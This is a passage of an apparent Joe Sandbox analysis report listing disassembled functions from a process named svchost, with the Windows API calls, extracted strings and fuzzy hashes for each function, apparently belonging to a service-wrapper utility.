                                                    • Opcode Fuzzy Hash: b5758bec216b926b4d62f608ffe3328bbd5e3024216705962de944ccca3494a7
                                                    • Instruction Fuzzy Hash: 630180B2B4472377E23066657C05EBB2B58DF86BA5F144276FE20E62D0D978CC0195AC
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0040A083
                                                    • __snwprintf_s.LIBCMT ref: 0040A0A1
                                                    • GetLastError.KERNEL32(00000000), ref: 0040A0AA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastOpenProcess__snwprintf_s
                                                    • String ID: %lu
                                                    • API String ID: 1619034979-685833217
                                                    • Opcode ID: fd9c7b49e71a33996ba9c2a805d512b294e08a555ec79916aaafb0d51c83362a
                                                    • Instruction ID: 8f5ceacfd598cb2394abf54756f4a9d9aecdfdb9d28b481e073514ca66ad884b
                                                    • Opcode Fuzzy Hash: fd9c7b49e71a33996ba9c2a805d512b294e08a555ec79916aaafb0d51c83362a
                                                    • Instruction Fuzzy Hash: 6C31ADB66002006BD2049765DC82EEFB3A4EF8C324F84452FF509D7291F678E69587DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: kill_console
                                                    • API String ID: 0-1600766264
                                                    • Opcode ID: b512eac6a5c75acfedc64106a28a87c7925d39300a97012badd4a903b776b279
                                                    • Instruction ID: 6b8feeb58a831c22132309c7bed50a8a77aa2e1ca0f50238c9c6c98eb8e5a449
                                                    • Opcode Fuzzy Hash: b512eac6a5c75acfedc64106a28a87c7925d39300a97012badd4a903b776b279
                                                    • Instruction Fuzzy Hash: 202106F6A0030067F6206665BC4AFEB325CCB8035CF45843AFA09E72C2F97DDC9145AA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f38156d83b47b1d3b9d2af6ee629cc77d86bd27f8c3302232bc967707eea2e8
                                                    • Instruction ID: 426f323d08f1782c1e6f60194951a9d10300faf2c5e3bd40731d4607ec8a1430
                                                    • Opcode Fuzzy Hash: 6f38156d83b47b1d3b9d2af6ee629cc77d86bd27f8c3302232bc967707eea2e8
                                                    • Instruction Fuzzy Hash: 0041B772A042015FC720DB55DC45BEBB3E8EBC8754F04492AF95483240E7B8E9C5C7A6
                                                    APIs
                                                      • Part of subcall function 0040B310: __snwprintf_s.LIBCMT ref: 0040B349
                                                    • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0040B65F
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040B66A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue__snwprintf_s
                                                    • String ID: %lu$AppExit
                                                    • API String ID: 2736435911-2506947422
                                                    • Opcode ID: 360aecef11bcee73e09b5d0cd0e78933fc472dd2aa08b67d38fa45625f26d4c0
                                                    • Instruction ID: c411b45a6930565bb1268b54e23c5314efaf1e743d4ddd058092e23d946cddcd
                                                    • Opcode Fuzzy Hash: 360aecef11bcee73e09b5d0cd0e78933fc472dd2aa08b67d38fa45625f26d4c0
                                                    • Instruction Fuzzy Hash: 4E31B2726043046BD300DB25DC41AAFB7E8EFC8314F84492EFA5992281FB7AD5458BDA
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004122FA
                                                    • HeapFree.KERNEL32(00000000), ref: 00412301
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID: SERVICE_FILE_SYSTEM_DRIVER$SERVICE_INTERACTIVE_PROCESS$SERVICE_KERNEL_DRIVER$SERVICE_WIN32_OWN_PROCESS$SERVICE_WIN32_SHARE_PROCESS$SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
                                                    • API String ID: 3859560861-2402770260
                                                    • Opcode ID: c4bcd49acf320aad884df7014bda7e7aedb362f20f7b40cc470d6da00f593dac
                                                    • Instruction ID: 3fa550764ded5b60e080b7974a66712a4ad7996e9d168e8143a02efed0acfda5
                                                    • Opcode Fuzzy Hash: c4bcd49acf320aad884df7014bda7e7aedb362f20f7b40cc470d6da00f593dac
                                                    • Instruction Fuzzy Hash: BC21AFFE6003051BD600DB79AEC99AB335CEB85309F18896AFC14C2341E37DECD49269
                                                    APIs
                                                    • GetProcAddress.KERNEL32(?,?), ref: 00408267
                                                    • GetLastError.KERNEL32 ref: 0040827B
                                                    • __cftoe.LIBCMT ref: 0040828F
                                                      • Part of subcall function 00413380: __mbstowcs_s_l.LIBCMT ref: 00413396
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082A7
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004082AA
                                                    • __cftoe.LIBCMT ref: 004082C7
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082F9
                                                    • HeapFree.KERNEL32(00000000), ref: 004082FC
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process__cftoe$AddressAllocErrorFreeLastProc__mbstowcs_s_l
                                                    • String ID:
                                                    • API String ID: 323180873-0
                                                    • Opcode ID: b05e2564cea1b0aa3f2908587e94aa4160ead8b2f5666b2d7813d052930b67d1
                                                    • Instruction ID: 2e5e402e2c2626b49358907e613a0df75488633df38e2a23a78af6a6010d2103
                                                    • Opcode Fuzzy Hash: b05e2564cea1b0aa3f2908587e94aa4160ead8b2f5666b2d7813d052930b67d1
                                                    • Instruction Fuzzy Hash: C911D2B1505310BBC3109B55DC49F9BB7ACEF89718F10466DF915A7282DA34D800CB7A
                                                    APIs
                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 004057AF
                                                    • EnableWindow.USER32(00000000), ref: 004057B8
                                                    • GetDlgItem.USER32(00000000,0000040F), ref: 004057CA
                                                    • EnableWindow.USER32(00000000), ref: 004057CD
                                                    • GetDlgItem.USER32(00000000,00000410), ref: 004057DB
                                                    • EnableWindow.USER32(00000000), ref: 004057DE
                                                    • GetDlgItem.USER32(00000000,00000411), ref: 004057ED
                                                    • EnableWindow.USER32(00000000), ref: 004057F0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: EnableItemWindow
                                                    • String ID:
                                                    • API String ID: 3833022359-0
                                                    • Opcode ID: 31b3fd158049fa77296440bbcea545347585c868fa80e3e4f9f83df952b283d7
                                                    • Instruction ID: e2f7c1c09c8d93b2009dc5b4c4f002420ea12ae4a46ab4e20d95bb4881afef45
                                                    • Opcode Fuzzy Hash: 31b3fd158049fa77296440bbcea545347585c868fa80e3e4f9f83df952b283d7
                                                    • Instruction Fuzzy Hash: 37F0AEF1F4031C36D610E7B57C84D676B6CEBC4591B058436B700D3190CDF8EA058A74
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _fwprintf
                                                    • String ID: %s
                                                    • API String ID: 394020290-620797490
                                                    • Opcode ID: 2c1e00e8f750eab5735f62461effd94720a9cb9abffd7c14ceba235e15ae4272
                                                    • Instruction ID: 75f6ff0ad44b13ca8f97eaa8f5d04c03990c627219346353a10bb8e85013ff75
                                                    • Opcode Fuzzy Hash: 2c1e00e8f750eab5735f62461effd94720a9cb9abffd7c14ceba235e15ae4272
                                                    • Instruction Fuzzy Hash: EC4135B1A0020067E6105B79AD49BAB73489B44329F14023AF715E72E2E778CC92D6AD
                                                    APIs
                                                      • Part of subcall function 004084D0: __snwprintf_s.LIBCMT ref: 00408511
                                                    • _memset.LIBCMT ref: 0040B4CF
                                                    • _memset.LIBCMT ref: 0040B544
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _memset$__snwprintf_s
                                                    • String ID: AppStderr$AppStdin$AppStdout
                                                    • API String ID: 2562117923-491939989
                                                    • Opcode ID: 4e0be652339b1084abb8e3e740910de37694cbfcd9fe9fd7c93284c9240b7e06
                                                    • Instruction ID: 1b06f4d84a2b42bb779b35d5d98be90b00d199c4a4a766b1a98f55c8d30fc170
                                                    • Opcode Fuzzy Hash: 4e0be652339b1084abb8e3e740910de37694cbfcd9fe9fd7c93284c9240b7e06
                                                    • Instruction Fuzzy Hash: B24180F2644305BBE320DE55EC42F97B3ECEF84755F10042EF2598A2C1EBB5A5488BA5
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 004102F8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004102FB
                                                    • __snwprintf_s.LIBCMT ref: 0041031D
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041032E
                                                    • HeapFree.KERNEL32(00000000), ref: 00410331
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree__snwprintf_s
                                                    • String ID: value_from_string()
                                                    • API String ID: 2465375985-962593079
                                                    • Opcode ID: 32f829b42f32a28a4e5a4ac7d68f27ece40f46b8ce26e11d520957f2533d3fbb
                                                    • Instruction ID: bb1032cf64baaab7dc3efed814e35f34ffcfd1963eead0c03da6be78f6f1ad05
                                                    • Opcode Fuzzy Hash: 32f829b42f32a28a4e5a4ac7d68f27ece40f46b8ce26e11d520957f2533d3fbb
                                                    • Instruction Fuzzy Hash: 271129B26042156BD71067AADC45FE7339CDF91369F004666FC29C72C0E6F8E8C08669
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_s$ExtensionFindPathSystemTime
                                                    • String ID: %s%s$-%04u%02u%02uT%02u%02u%02u.%03u%s
                                                    • API String ID: 104670371-3937541175
                                                    • Opcode ID: b111bf3271d38600ad9c55f70640b5fcacb5e3e09fac70907e172ba85b97e1c1
                                                    • Instruction ID: b79bb978c2d6968e54da41b461fb302b9f59bf9436526885e0c642140c4c9fbb
                                                    • Opcode Fuzzy Hash: b111bf3271d38600ad9c55f70640b5fcacb5e3e09fac70907e172ba85b97e1c1
                                                    • Instruction Fuzzy Hash: 6111B4B15143116ED334DB55DC41DBBB3E8EFC8B10F40892EB9A9C22D1EABC9580D7A5
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00007FFF), ref: 004051DC
                                                    • _memset.LIBCMT ref: 004051EB
                                                    • CreateProcessW.KERNEL32 ref: 0040522C
                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 0040523D
                                                    • GetLastError.KERNEL32 ref: 0040525A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Process$CreateErrorFileLastModuleNameTerminate_memset
                                                    • String ID: D
                                                    • API String ID: 3492820992-2746444292
                                                    • Opcode ID: 9dd1c94f525b39c6e15edc8379d8a417f697b7542ed4c4ee5f829fe84b09a39f
                                                    • Instruction ID: ec264b7909b663423e436220cfe4819a88d4f1dffac62785d33a99ea7066e5a1
                                                    • Opcode Fuzzy Hash: 9dd1c94f525b39c6e15edc8379d8a417f697b7542ed4c4ee5f829fe84b09a39f
                                                    • Instruction Fuzzy Hash: B11154B1654300AFD320DB64DD46BEB77E4AF8C704F40482DB699D61D0EBB895488F96
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00415994
                                                      • Part of subcall function 00416431: __getptd_noexit.LIBCMT ref: 00416434
                                                      • Part of subcall function 00416431: __amsg_exit.LIBCMT ref: 00416441
                                                    • __amsg_exit.LIBCMT ref: 004159B4
                                                    • __lock.LIBCMT ref: 004159C4
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004159E1
                                                    • InterlockedIncrement.KERNEL32(02502250), ref: 00415A0C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                    • String ID: H*B
                                                    • API String ID: 4271482742-1987176958
                                                    • Opcode ID: ae82dc6bd3ee7ef20407319b7cb59c0de88f678f5595f3ffd61352e31e938958
                                                    • Instruction ID: 0f1790ebc6eee61fc3f291717e61b7ca4878fd8235e58e257555a432dd93126f
                                                    • Opcode Fuzzy Hash: ae82dc6bd3ee7ef20407319b7cb59c0de88f678f5595f3ffd61352e31e938958
                                                    • Instruction Fuzzy Hash: F2012B71A10B21EBC720AB25A4053DE77B0BF80724F01015BE804A3380C7BC99C2CBCE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: get_service_dependencies()$lpDependencies
                                                    • API String ID: 0-219018013
                                                    • Opcode ID: bf4c0c836f5ec2d75db8984220f7ba768897816f801aee747be6389641c48457
                                                    • Instruction ID: 3e3e4e8d9a81c198e56250067319da3111a355b174864df4f52def3845c595e2
                                                    • Opcode Fuzzy Hash: bf4c0c836f5ec2d75db8984220f7ba768897816f801aee747be6389641c48457
                                                    • Instruction Fuzzy Hash: 3F51C1B19002019FD724DF99D880AA7B3F5FF94315F24492EE885972C1EB78E898CB95
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6db5205aaf5c7a69da1a2ed089abba3dd97014ecf3ecdbfc37bc27497026141
                                                    • Instruction ID: 41e637edb1b435abd6f35276a328e9c15e151e7885b7bbb8ba59d22f3675d668
                                                    • Opcode Fuzzy Hash: f6db5205aaf5c7a69da1a2ed089abba3dd97014ecf3ecdbfc37bc27497026141
                                                    • Instruction Fuzzy Hash: 9F21F4F2900200B7D710ABA6FC89FDB7B6CDF9935AF00403AFA48D6142E779D4558A79
                                                    APIs
                                                    • GetDlgItem.USER32(00000000,00000406), ref: 0040583A
                                                    • EnableWindow.USER32(00000000), ref: 00405843
                                                    • GetDlgItem.USER32(00000000,00000407), ref: 00405852
                                                    • EnableWindow.USER32(00000000), ref: 00405855
                                                    • GetDlgItem.USER32(00000000,00000408), ref: 00405864
                                                    • EnableWindow.USER32(00000000), ref: 00405867
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: EnableItemWindow
                                                    • String ID:
                                                    • API String ID: 3833022359-0
                                                    • Opcode ID: afe6c0985e8651cac2700cf40326becd62c8317a26ee51371698d98f401e2890
                                                    • Instruction ID: 2ec9d1a14a3b6aefc49800d07f008e7303e744d1587428ffcda7d95d197ea67b
                                                    • Opcode Fuzzy Hash: afe6c0985e8651cac2700cf40326becd62c8317a26ee51371698d98f401e2890
                                                    • Instruction Fuzzy Hash: A8E012F2B0131476D520EBFA9CD8C97ABACEFC9A51B418815B74497050C979D502C778
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LocalSystem
                                                    • API String ID: 0-3718507506
                                                    • Opcode ID: 004bf6b67739aa68ca3577fdd567ccf4bb5dc038922f0632643093c5b059ae31
                                                    • Instruction ID: c55ad329f1ab7e7a319801d33323cd4f3fc7c6193fc44e9fe0b0950f6bea607c
                                                    • Opcode Fuzzy Hash: 004bf6b67739aa68ca3577fdd567ccf4bb5dc038922f0632643093c5b059ae31
                                                    • Instruction Fuzzy Hash: 1C512A72E043405BD6205779BC45BD737989B81738F08063AFE65D73E1E72CEC8882AA
                                                    APIs
                                                      • Part of subcall function 0040D950: GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
                                                      • Part of subcall function 0040D950: HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F
                                                    • __snwprintf_s.LIBCMT ref: 0040FF11
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • __snwprintf_s.LIBCMT ref: 0040FF73
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap__snwprintf_s$AllocFreeLocalProcess__vsnwprintf_s_l_vfwprintf
                                                    • String ID: pre_install_service()$service
                                                    • API String ID: 792397322-3337766052
                                                    • Opcode ID: 0711bef75259c87616e8d0ee0a386299807506027fbb92d94be555ef7681361a
                                                    • Instruction ID: 26704b136dc3d9749b1074aa21864745be87e0fb96ff5d59f0470137026c55c2
                                                    • Opcode Fuzzy Hash: 0711bef75259c87616e8d0ee0a386299807506027fbb92d94be555ef7681361a
                                                    • Instruction Fuzzy Hash: 614170B29003026BC710EA54DC82EA77354EF91318F14413FF914A72C2E63DF9598799
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _fwprintf
                                                    • String ID: %s$( B
                                                    • API String ID: 394020290-3552019876
                                                    • Opcode ID: fb6fc9bafc8bb4bc176331903f766b2f4ebe819c5f0e0d4e4c6cfed62a37235d
                                                    • Instruction ID: 76538ebeed6a30712826624a3ba4fa343d335bada35abf236fb5f47343afded2
                                                    • Opcode Fuzzy Hash: fb6fc9bafc8bb4bc176331903f766b2f4ebe819c5f0e0d4e4c6cfed62a37235d
